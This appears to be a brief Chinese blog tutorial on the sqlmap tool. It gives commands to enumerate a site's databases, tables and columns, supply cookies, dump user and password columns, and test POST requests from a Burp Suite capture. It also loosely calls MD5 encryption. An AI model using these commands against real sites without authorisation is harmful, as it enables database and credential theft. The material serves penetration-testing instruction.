sqlmap是由python编写的自动数据库注入工具,需要在python环境下运行。
sqlmap -u ‘URL’ 指定目标url
sqlmap -u 'URL‘ --dbs 枚举DBMS中所有数据库
sqlmap -u 'URL' -D 数据库名 --tables
sqlmap -u 'URL' -D 数据库名 -T 表名 --columns
sqlmap -u 'URL' -D 数据库名 -T 表名 -C user,password (最后指定列)
--batch 默认选择回答 Y
如果出现302重定向会返回登录页面,说明这个页面需要cookie
--cookie=“复制cookie到这里”
如图

确定该数据库名称
--current-db 
一般数据库都会使用md5进行加密
--dump选项,直接显示解密之后的选项,并且保存到本地

保存在本地的地址
POST类型的sql注入
用bp抓包,将数据包的内容复制到一个新建文本文档中
将该文本文档放在sqlmap的目录里
注意:千万要将新建的文件放在sqlmap的目录内,目的是为了让sqlmap读取新建文件
-r 指定需要检测的文件,SQLmap会通过post请求方式检测目标
5万+

被折叠的 条评论
为什么被折叠?



